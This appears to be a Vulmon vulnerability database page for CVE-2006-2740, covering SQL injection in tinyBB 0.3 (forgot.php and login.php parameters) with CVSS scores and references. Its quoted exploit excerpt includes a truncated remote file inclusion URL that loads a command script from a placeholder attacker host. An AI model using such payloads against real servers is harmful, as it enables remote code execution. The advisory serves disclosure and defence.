Published: 01/06/2006 Updated: 18/10/2018

CVSS v2 Base Score: 6.8 | Impact Score: 6.4 | Exploitability Score: 8.6

VMScore: 685

Vector: AV:N/AC:M/Au:N/C:P/I:P/A:P

Multiple SQL injection vulnerabilities in Epicdesigns tinyBB 0.3 allow remote malicious users to execute arbitrary SQL commands via the (1) q parameter in (a) forgot.php, and the (2) username and (3) password parameters in (b) login.php, and other unspecified vectors.

Vulnerable Product	Search on Vulmon	Subscribe to Product
epic designs tinybb

tinyBB <= 03 Multiple Remote Vulnerabilities Method found by nukedx, Contacts > ICQ: 10072 MSN/Mail: nukedx@nukedxcom web: wwwnukedxcom This exploits works on tinyBB <= 03 Original advisory can be found at: wwwnukedxcom/?viewdoc=33 [victim]/[tBBPath]/footersphp?tinybb_footers=yourhostcom/cmdtxt? [victi ...

NVD-CWE-Other http://www.nukedx.com/?getxpl=33 http://www.nukedx.com/?viewdoc=33 http://www.securityfocus.com/bid/18147 http://securitytracker.com/id?1016172 http://secunia.com/advisories/20356 http://securityreason.com/securityalert/1011 http://www.vupen.com/english/advisories/2006/2035 https://exchange.xforce.ibmcloud.com/vulnerabilities/26826 http://www.securityfocus.com/archive/1/435281/100/0/threaded https://nvd.nist.gov https://www.exploit-db.com/exploits/1839/

Get Started

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Twitter Reddit Linkedin Facebook

CVE-2006-2740

Vulnerability Summary

Exploits

References

Vulmon Search

About

Products

Connect